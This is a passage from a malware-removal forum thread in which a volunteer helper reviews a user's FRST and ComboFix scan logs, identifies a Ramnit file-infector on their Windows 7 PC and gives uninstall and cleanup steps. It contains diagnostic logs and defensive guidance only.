Task: {EBEBBA2B-AB14-44E8-B131-92E34AC3E2F3} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {EDEC679B-5755-4CF1-B172-257318B97B63} - System32\Tasks\{E2AC0E2A-FABC-464C-9FAF-E7C3378F827F} => Chrome.exe http://ui.skype.com/ui/0/6.10.0.104/en/go/help.faq.installer?LastError=1638
Task: {FABC2E39-07DC-4848-8C80-40D84163C69F} - System32\Tasks\{A1C8EB35-0EFC-41B7-87AB-48F00D51AA70} => Chrome.exe http://ui.skype.com/ui/0/6.10.0.104/en/go/help.faq.installer?LastError=1638
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-1.job => C:\Program Files\SavePass\SavePass-codedownloader.exe
Task: C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-10.job => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-10.exe
Task: C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-11.job => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-11.exe
Task: C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-2.job => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-2.exe
Task: C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-4.job => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-4.exe
Task: C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-5.job => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-5.exe
Task: C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-5_user.job => C:\Program Files\SavePass\59ccd92f-75cc-4431-91a3-1042c6972546-5.exe
Task: C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-6.job => C:\Program Files\SavePass\SavePass-novainstaller.exe
Task: C:\Windows\Tasks\59ccd92f-75cc-4431-91a3-1042c6972546-7.job => C:\Program Files\SavePass\SavePass-nova.exe
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-1.job => C:\Program Files\HD-V1.9\HD-V1.9-codedownloader.exe <==== ATTENTION
Task: C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-10.job => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-10.exe <==== ATTENTION
Task: C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-11.job => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-11.exe <==== ATTENTION
Task: C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-2.job => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-2.exe <==== ATTENTION
Task: C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-4.job => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-4.exe <==== ATTENTION
Task: C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-5.job => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-5_user.job => C:\Program Files\HD-V1.9\b237092c-44da-4d02-bc4b-e1762a890620-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-6.job => C:\Program Files\HD-V1.9\HD-V1.9-novainstaller.exe <==== ATTENTION
Task: C:\Windows\Tasks\b237092c-44da-4d02-bc4b-e1762a890620-7.job => C:\Program Files\HD-V1.9\HD-V1.9-nova.exe <==== ATTENTION
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\SDMsgUpdate (SD).job => C:\Program Files\SmartDraw 2013\Messages\SDNotify.exe
 
==================== Loaded Modules (whitelisted) =============
 
2014-04-23 16:05 - 2014-04-23 16:05 - 00073544 ____N () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2014-04-23 16:04 - 2014-04-23 16:04 - 01044808 ____N () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2013-11-24 12:48 - 2013-11-24 12:48 - 00065264 ____N () C:\Program Files\TortoiseSVN\bin\TortoiseStub32.dll
2013-11-24 12:48 - 2013-11-24 12:48 - 00071408 ____N () C:\Program Files\TortoiseSVN\bin\libsasl32.dll
2014-07-31 21:07 - 2014-07-31 21:07 - 00035328 _____ () C:\Program Files\FileZilla FTP Client\fzshellext.dll
2014-05-24 22:26 - 2014-05-24 22:26 - 00091648 _____ () C:\Program Files\FileZilla FTP Client\libgcc_s_sjlj-1.dll
2014-05-24 22:26 - 2014-05-24 22:26 - 00892416 _____ () C:\Program Files\FileZilla FTP Client\libstdc++-6.dll
2014-08-01 11:47 - 2011-05-28 22:04 - 00140288 _____ () C:\Program Files\WinRAR\rarext.dll
2014-05-12 15:34 - 2014-05-12 15:34 - 00260608 _____ () C:\Program Files\Notepad++\NppShell_06.dll
2013-03-07 11:08 - 2012-12-04 15:25 - 00137216 ____N () C:\Program Files\PostgreSQL\9.2\bin\LIBPQ.dll
2013-03-07 11:09 - 2012-08-14 19:15 - 01009664 ____N () C:\Program Files\PostgreSQL\9.2\bin\libxml2.dll
2013-09-10 16:18 - 2011-01-07 23:14 - 00464172 ____N () D:\wamp\bin\apache\apache2.2.17\bin\LIBPQ.dll
2014-08-01 17:57 - 2014-08-01 17:56 - 00159768 _____ () C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\3.1.0\loggingserver.exe
2014-08-01 17:57 - 2014-08-01 17:56 - 00519704 _____ () C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\3.1.0\log4cplusU.dll
2014-08-01 17:57 - 2014-08-01 17:56 - 02575384 _____ () C:\Program Files\AVG Web TuneUp\vprot.exe
2013-05-17 10:43 - 2014-07-30 15:18 - 03547136 ____N () C:\Program Files\Free Download Manager\fdmbtsupp.dll
2013-10-09 18:37 - 2013-06-08 21:29 - 02926848 ____N () C:\Windows\wweb32.dll
2014-06-26 20:17 - 2014-06-26 20:17 - 17381826 ____N () C:\Program Files\ownCloud\owncloud.exe
2014-06-20 11:04 - 2014-06-20 11:04 - 01980622 ____N () C:\Program Files\ownCloud\icui18n51.dll
2014-06-20 11:04 - 2014-06-20 11:04 - 01265668 ____N () C:\Program Files\ownCloud\icuuc51.dll
2014-06-20 11:04 - 2014-06-20 11:04 - 22328477 ____N () C:\Program Files\ownCloud\icudata51.dll
2014-06-20 13:44 - 2014-06-20 13:44 - 00095268 ____N () C:\Program Files\ownCloud\libgcc_s_sjlj-1.dll
2014-06-20 13:44 - 2014-06-20 13:44 - 00846908 ____N () C:\Program Files\ownCloud\libstdc++-6.dll
2014-06-20 10:57 - 2014-06-20 10:57 - 00144011 ____N () C:\Program Files\ownCloud\libpcre16-0.dll
2014-06-20 10:57 - 2014-06-20 10:57 - 00083490 ____N () C:\Program Files\ownCloud\zlib1.dll
2014-06-20 10:58 - 2014-06-20 10:58 - 01345107 ____N () C:\Program Files\ownCloud\libGLESv2.dll
2014-06-20 10:58 - 2014-06-20 10:58 - 00203045 ____N () C:\Program Files\ownCloud\libpng16-16.dll
2014-06-26 20:16 - 2014-06-26 20:16 - 16697801 ____N () C:\Program Files\ownCloud\libowncloudsync.dll
2014-06-26 20:16 - 2014-06-26 20:16 - 00777549 ____N () C:\Program Files\ownCloud\libocsync.dll
2014-06-26 14:32 - 2014-06-26 14:32 - 00157526 ____N () C:\Program Files\ownCloud\libneon-27.dll
2014-06-17 10:04 - 2014-06-17 10:04 - 00169101 ____N () C:\Program Files\ownCloud\libproxy.dll
2014-06-17 10:01 - 2014-06-17 10:01 - 00041592 ____N () C:\Program Files\ownCloud\libmodman.dll
2014-06-20 11:03 - 2014-06-20 11:03 - 01150462 ____N () C:\Program Files\ownCloud\libxml2-2.dll
2013-09-24 11:00 - 2013-09-24 11:00 - 00566268 ____N () C:\Program Files\ownCloud\libsqlite3-0.dll
2014-06-20 10:58 - 2014-06-20 10:58 - 00150394 ____N () C:\Program Files\ownCloud\libEGL.dll
2014-06-20 10:59 - 2014-06-20 10:59 - 00196540 ____N () C:\Program Files\ownCloud\libjpeg-8.dll
2014-06-20 11:07 - 2014-06-20 11:07 - 00246506 ____N () C:\Program Files\ownCloud\libwebp-4.dll
2014-06-20 11:58 - 2014-06-20 11:58 - 00228133 ____N () C:\Program Files\ownCloud\libxslt-1.dll
2014-06-17 11:44 - 2014-06-17 11:44 - 00059083 ____N () C:\Program Files\ownCloud\libqt5keychain.dll
2014-06-20 13:16 - 2014-06-20 13:16 - 00637003 ____N () C:\Program Files\ownCloud\platforms\qwindows.dll
2014-06-20 13:16 - 2014-06-20 13:16 - 00032046 ____N () C:\Program Files\ownCloud\imageformats\qgif.dll
2014-06-20 13:16 - 2014-06-20 13:16 - 00033454 ____N () C:\Program Files\ownCloud\imageformats\qico.dll
2014-06-20 13:16 - 2014-06-20 13:16 - 00047735 ____N () C:\Program Files\ownCloud\imageformats\qjpeg.dll
2014-06-20 13:16 - 2014-06-20 13:16 - 00060152 ____N () C:\Program Files\ownCloud\sqldrivers\qsqlite.dll
2014-08-04 13:43 - 2014-08-04 13:43 - 00043008 _____ () c:\users\user\appdata\local\temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpc7plhn.dll
2013-10-19 05:40 - 2014-07-30 15:19 - 25100288 ____N () C:\Users\User\AppData\Roaming\Dropbox\bin\libcef.dll
2014-07-21 14:17 - 2014-07-21 14:17 - 00436576 ____N () C:\Program Files\Evernote\Evernote\libxml2.dll
2014-07-21 14:17 - 2014-07-21 14:17 - 00318304 ____N () C:\Program Files\Evernote\Evernote\libtidy.dll
2011-06-06 00:39 - 2010-12-31 21:24 - 08133120 ____N () D:\wamp\bin\mysql\mysql5.5.8\bin\mysqld.exe
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\Users\.DS_Store:AFP_AfpInfo
AlternateDataStreams: C:\Users\User\.DS_Store:AFP_AfpInfo
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\98891617.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\98891617.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys => ""="Driver"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\startupreg: Adobe Reader Speed Launcher => "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: AdobeBridge => "C:\Program Files\Adobe\Adobe Bridge CS5\Bridge.exe" -stealth
MSCONFIG\startupreg: Facebook Update => "C:\Users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver
MSCONFIG\startupreg: googletalk => C:\Users\User\AppData\Roaming\Google\Google Talk\googletalk.exe /autostart
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: Messenger (Yahoo!) => "C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -quiet
MSCONFIG\startupreg: NeroFilterCheck => C:\Windows\system32\NeroCheck.exe
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files\QuickTime\QTTask.exe" -atboottime
 
==================== Faulty Device Manager Devices =============
 
Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (08/04/2014 01:50:48 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.Windows.SystemCompatible,processorArchitecture="x86",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.7600.16816"1".
Dependent Assembly Microsoft.Windows.SystemCompatible,processorArchitecture="x86",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.7600.16816" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (08/04/2014 01:50:07 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program FRST.exe version 2.8.2014.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 1e70
 
Start Time: 01cfafba4833b0a7
 
Termination Time: 14
 
Application Path: E:\Myfiles and backup\svchost remover\FRST.exe
 
Report Id:
 
Error: (08/04/2014 01:47:24 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.Windows.SystemCompatible,processorArchitecture="x86",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.7600.16816"1".
Dependent Assembly Microsoft.Windows.SystemCompatible,processorArchitecture="x86",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.7600.16816" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (08/04/2014 01:45:04 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.Windows.SystemCompatible,processorArchitecture="x86",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.7600.16816"1".
Dependent Assembly Microsoft.Windows.SystemCompatible,processorArchitecture="x86",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.7600.16816" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (08/04/2014 01:43:59 PM) (Source: MSSQLSERVER) (EventID: 17207) (User: )
Description: FileMgr::StartLogFiles: Operating system error 2(failed to retrieve text for this error. Reason: 15105) occurred while creating or opening file 'C:\Downloads\onlineexam-14819\OnlineExam\App_Data\OnlineExam_log.LDF'. Diagnose and correct the operating system error, and retry the operation.
 
Error: (08/04/2014 01:43:59 PM) (Source: MSSQLSERVER) (EventID: 17207) (User: )
Description: FileMgr::StartLogFiles: Operating system error 2(failed to retrieve text for this error. Reason: 15105) occurred while creating or opening file 'C:\Downloads\AdventureWorks2008_Database\AdventureWorks2008_Log.ldf'. Diagnose and correct the operating system error, and retry the operation.
 
Error: (08/04/2014 01:43:59 PM) (Source: MSSQLSERVER) (EventID: 17207) (User: )
Description: FileMgr::StartLogFiles: Operating system error 2(failed to retrieve text for this error. Reason: 15105) occurred while creating or opening file 'E:\FinalYearProject\eLearning\eLearning\App_Data\eLearning_log.ldf'. Diagnose and correct the operating system error, and retry the operation.
 
Error: (08/04/2014 01:43:59 PM) (Source: MSSQLSERVER) (EventID: 17207) (User: )
Description: FileMgr::StartLogFiles: Operating system error 2(failed to retrieve text for this error. Reason: 15105) occurred while creating or opening file 'E:\RubimDB\college\MvcFormsAuthenticationSample--\MvcFormsAuthenticationSample\App_Data\userDb_log.ldf'. Diagnose and correct the operating system error, and retry the operation.
 
Error: (08/04/2014 01:43:59 PM) (Source: MSSQLSERVER) (EventID: 17204) (User: )
Description: FCB::Open failed: Could not open file C:\Downloads\onlineexam-14819\OnlineExam\App_Data\OnlineExam.mdf for file number 1.  OS error: 3(failed to retrieve text for this error. Reason: 15105).
 
Error: (08/04/2014 01:43:58 PM) (Source: MSSQLSERVER) (EventID: 17204) (User: )
Description: FCB::Open failed: Could not open file E:\RubimDB\college\MvcFormsAuthenticationSample--\MvcFormsAuthenticationSample\App_Data\userDb.mdf for file number 1.  OS error: 3(failed to retrieve text for this error. Reason: 15105).
 
 
System errors:
=============
Error: (08/04/2014 01:44:41 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load: 
cdrom
 
Error: (08/04/2014 01:42:03 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Mongo DB service failed to start due to the following error: 
%%1053
 
Error: (08/04/2014 01:42:03 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Mongo DB service to connect.
 
Error: (08/04/2014 09:28:32 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load: 
cdrom
 
Error: (08/04/2014 09:27:16 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Mongo DB service failed to start due to the following error: 
%%1053
 
Error: (08/04/2014 09:27:16 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Mongo DB service to connect.
 
Error: (08/03/2014 11:15:50 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load: 
cdrom
 
Error: (08/03/2014 11:13:46 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Mongo DB service failed to start due to the following error: 
%%1053
 
Error: (08/03/2014 11:13:46 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Mongo DB service to connect.
 
Error: (08/01/2014 05:59:26 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The AVG WatchDog service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 0 milliseconds: Restart the service.
 
 
Microsoft Office Sessions:
=========================
Error: (07/04/2014 04:49:14 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 1, Application Name: Microsoft Office Excel, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 1127 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (07/04/2014 04:25:24 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 1, Application Name: Microsoft Office Excel, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 92 seconds with 60 seconds of active time.  This session ended with a crash.
 
Error: (07/04/2014 04:23:36 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 1, Application Name: Microsoft Office Excel, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 642 seconds with 60 seconds of active time.  This session ended with a crash.
 
 As i said earlier, scan process doesn't go ahead of it (office sessions), so would you like me to  uninstall/remove the office package and try the FRST scan recovery tool again???


#5 jsutbee

jsutbee
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:11:39 AM

Posted 04 August 2014 - 04:10 AM

Sorry to bother you again, I thought AVG was healing all my html files that got infected before  but instead it was removing/deleting from my pc :(. Whenever i try to open a folder consisting of html files , it detects virus as "virus found VBS/Heur and suggests me to remove. I cant open those files and check anything inside it in any of my IDEs (sublime/notepad ++).



#6 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,079 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:05:54 AM

Posted 04 August 2014 - 11:14 AM

Hi jsutbee,
 
Your HTML files are infected by a worm called Ramnit.
 
I'm afraid I have very bad news.

Win32/Ramnit.A is a file infector with IRCBot functionality which infects .exe, and .HTML/HTM files, and opens a back door that compromises your computer. Using this backdoor, a remote attacker can access and instruct the infected computer to download and execute more malicious files. The infected .HTML or .HTM files may be detected as Virus:VBS/Ramnit.AWin32/Ramnit.A!dll is a related file infector often seen with this infection. It too has IRCBot functionality which infects .exe, .dll  and .HTML/HTM files and opens a back door that compromises your computer. This component is injected into the default web browser by Worm:Win32/Ramnit.A which is dropped by a Ramnit infected executable file.
 
Ramnit is commonly spread via a flash drive (usb, pen, thumb, jump) infection where it copies Worm:Win32/Ramnit.A with a random file name. The infection is often contracted by visiting remotecrack and keygen sites. These type of sites are infested with a smörgåsbord of malware and a major source of system infection.
 
It would be quicker and easier to reformat, but I'm willing to help you try and clean the infection. There are no guarantees, and it's possible that your computer could become unbootable or become reinfected later on.
 
--------------
 
If you wish to clean then follow the rest of this post:
 
Have you set these proxies yourself?:
ProxyServer: 133.242.131.152:443
FF NetworkProxy: "http", "125.195.133.102"
FF NetworkProxy: "http_port", 808
 
--------------

We need to remove some programs with Revo Uninstaller Free:
 
Note: Revo Uninstaller is more thorough in deleting programs on your computer than using the Add/Remove option in Windows. Since it is a more powerful tool, please be sure to follow the instructions carefully.
Note: If the program you want to uninstall is not listed by Revo, let me know and we will try an altenate method of removal.

  • Please download and install Revo Uninstaller Free
    note: there is no need to click anything on that page, the download will start automatically
  • Double click Revo Uninstaller to run it
  • From the list of programs double click on the listed program(s), or anything similar, to remove it:
McAfee Security Scan Plus
Media Buzz
Media Player
Media View
Media Viewer
Media Watch
Network System Driver
Rich Media View
Video Player
Webexp Enhanced
  • When prompted if you want to uninstall click Yes
  • Be sure the Moderate option is selected then click Next
  • The program will run, If prompted again click Yes
  • When the built-in uninstaller is finished click on Next
  • Once the program has searched for leftovers click Next
  • Check the items in bold only on the list then click Delete
    note: you may have to expand some folders by clicking the "+" mark
  • When prompted click on Yes and then on Next
  • Put a check on any folders that are found and select Delete
  • When prompted select Yes then Next
  • Once done click Finish

--------------
 
Running Combofix:

Download Combofix from this link and save it to your desktop

  • Close any open browsers or any other programs that are open.
  • Double click on combofix.exe & follow the prompts.
  • When finished, it will produce a report for you.
  • You can also find the log here: C:\ComboFix.txt

Please also note:

  • Do not click combofix's window while it's running. That may cause combofix to stall.
  • Combofix may reboot your computer a number of times, this is normal.
  • If you receive an error, "Illegal operation attempted on a registry key that has been marked for deletion,"  then please restart the computer to resolve this.

--------------

To recap, in your next reply I would like to see the following. Make sure to copy & paste them unless I ask otherwise:

  • ComboFix.txt

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~


#7 jsutbee

jsutbee
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:11:39 AM

Posted 05 August 2014 - 01:14 AM

Hi Toffee,

As per your suggestion, successfully installed Revo Uninstaller  and removed all the programs that you listed above.

 

McAfee Security Scan Plus
Media Buzz
Media Player
Media View
Media Viewer
Media Watch
Network System Driver
Rich Media View
Video Player
Webexp Enhanced

 

 

Then installed combofix and went through as per your instruction. But in the first run, it restarted my pc and get stuck in the same screen for more than hour. Than i closed it, and make it run again and for the second time it works and genereate the logs(combofix.txt) as follows.

Combofix.txt

 

ComboFix 14-08-05.01 - User 5/2014 Tue  11:28:00.2.2 - x86
Microsoft Windows 7 Ultimate   6.1.7600.0.932.81.1033.18.3293.1635 [GMT 5.75:45]
Running from: e:\myfiles and backup\svchost remover\ComboFix.exe
AV: AVG AntiVirus Free Edition 2014 *Disabled/Updated* {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
SP: AVG AntiVirus Free Edition 2014 *Disabled/Updated* {B5F5C120-2089-702E-0001-553BB0D5A664}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 * Created a new restore point
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
---- Previous Run -------
.
c:\program files\Internet Explorer\dmlconf.dat
c:\program files\TrustMediaViewerV1
c:\users\User\AppData\Local\assembly\tmp
c:\windows\system32\Cache
c:\windows\system32\Cache\03241c939db144db.fb
c:\windows\system32\Cache\03241c939db144db__exp__1407130625
c:\windows\system32\config\systemprofile\AppData\Local\assembly\tmp
.
.
(((((((((((((((((((((((((((((((((((((((   Drivers/Services   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
-------\Legacy_NETHFDRV
.
.
(((((((((((((((((((((((((   Files Created from 2014-07-05 to 2014-08-05  )))))))))))))))))))))))))))))))
.
.
2014-08-05 05:54 . 2014-08-05 05:54 -------- d-----w- c:\users\postgres\AppData\Local\temp
2014-08-05 05:54 . 2014-08-05 05:54 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-08-05 05:54 . 2014-08-05 05:54 -------- d-----w- c:\users\Classic .NET AppPool\AppData\Local\temp
2014-08-05 05:54 . 2014-08-05 05:54 -------- d-----w- c:\windows\system32\config\systemprofile\AppData\Local\temp
2014-08-05 04:21 . 2014-08-05 04:21 -------- d-----w- c:\program files\VS Revo Group
2014-08-04 09:52 . 2014-08-04 09:52 -------- d-----w- c:\program files\TortoiseGit
2014-08-04 04:44 . 2014-08-04 08:05 -------- d-----w- C:\FRST
2014-08-03 05:43 . 2014-08-03 05:43 -------- d-----w- c:\windows\system32\%LOCALAPPDATA%
2014-08-03 05:39 . 2014-08-03 06:00 -------- d-----w- c:\windows\system32\config\systemprofile\AppData\Roaming\FileZilla
2014-08-03 05:37 . 2014-08-03 05:37 -------- d-----w- c:\windows\system32\config\systemprofile\AppData\Local\Skype
2014-08-03 05:37 . 2014-08-03 06:37 -------- d-----w- c:\windows\system32\config\systemprofile\AppData\Roaming\Skype
2014-08-03 05:37 . 2014-08-03 05:37 -------- d-----w- c:\windows\system32\config\systemprofile\AppData\Local\AVG Web TuneUp
2014-08-03 05:37 . 2014-08-05 05:09 -------- d-----w- c:\windows\system32\config\systemprofile\AppData\Local\assembly
2014-08-03 05:36 . 2014-08-03 05:36 -------- d-----w- c:\windows\system32\config\systemprofile\AppData\Local\TechSmith
2014-08-03 05:36 . 2014-08-03 07:03 -------- d-----w- c:\windows\system32\config\systemprofile\AppData\Local\TSVNCache
2014-08-01 12:12 . 2014-08-04 11:59 -------- d-----w- c:\users\User\AppData\Local\AVG Web TuneUp
2014-08-01 12:12 . 2014-08-03 05:33 -------- d-----w- c:\programdata\AVG Security Toolbar
2014-08-01 12:12 . 2014-08-01 12:11 42784 ----a-w- c:\windows\system32\drivers\avgtpx86.sys
2014-08-01 12:12 . 2014-08-01 12:12 -------- d-----w- c:\programdata\AVG Secure Search
2014-08-01 12:12 . 2014-08-01 12:12 -------- d-----w- c:\program files\Common Files\AVG Secure Search
2014-08-01 12:12 . 2014-08-01 12:12 -------- d-----w- c:\programdata\AVG Web TuneUp
2014-08-01 12:12 . 2014-08-01 12:12 -------- d-----w- c:\program files\AVG Web TuneUp
2014-07-31 11:51 . 2014-07-31 11:51 -------- d-----w- c:\program files\Tweaking.com
2014-07-31 07:25 . 2014-07-31 07:25 -------- d-----w- c:\users\User\AppData\Roaming\AVG2014
2014-07-31 07:22 . 2014-07-31 07:22 -------- d-----w- c:\windows\system32\config\systemprofile\AppData\Roaming\AVG2014
2014-07-31 07:21 . 2014-07-31 07:21 -------- d-----w- c:\users\User\AppData\Roaming\TuneUp Software
2014-07-31 07:19 . 2014-07-31 07:41 -------- d-----w- c:\programdata\AVG2014
2014-07-31 07:19 . 2014-08-01 12:14 -------- d-----w- c:\windows\system32\config\systemprofile\AppData\Local\Avg2014
2014-07-31 07:15 . 2014-07-31 07:41 -------- d-----w- c:\users\User\AppData\Local\Avg2014
2014-07-31 07:15 . 2014-07-31 07:15 -------- d-----w- c:\users\User\AppData\Local\MFAData
2014-07-31 05:45 . 2014-07-13 22:27 8217224 ------w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{8BBDE6C6-BD2C-4DE0-95CD-FD28042B54C9}\mpengine.dll
2014-07-30 10:16 . 2014-07-31 04:33 -------- d-----w- C:\AdwCleaner
2014-07-30 09:26 . 2014-07-30 09:26 -------- d-----w- C:\TDSSKiller_Quarantine
2014-07-30 09:18 . 2014-07-31 05:53 -------- d-----w- c:\programdata\AVAST Software
2014-07-30 03:35 . 2014-07-30 03:35 687 ----a-w- C:\awhE80D.tmp
2014-07-29 11:05 . 2014-07-29 11:05 687 ----a-w- C:\awhF508.tmp
2014-07-29 05:06 . 2014-07-29 05:06 687 ----a-w- C:\awhDFF2.tmp
2014-07-29 03:30 . 2014-07-29 03:30 687 ----a-w- C:\awhE5AC.tmp
2014-07-28 09:24 . 2014-07-28 09:24 687 ----a-w- C:\awhE446.tmp
2014-07-28 09:04 . 2014-07-28 09:04 687 ----a-w- C:\awhE040.tmp
2014-07-28 08:27 . 2014-07-28 08:27 687 ----a-w- C:\awh4D83.tmp
2014-07-28 05:26 . 2014-07-28 05:26 -------- d-----w- c:\program files\CCleaner
2014-07-28 03:38 . 2014-07-28 03:38 687 ----a-w- C:\awhE9F0.tmp
2014-07-25 12:13 . 2014-07-25 12:13 687 ----a-w- C:\awhF150.tmp
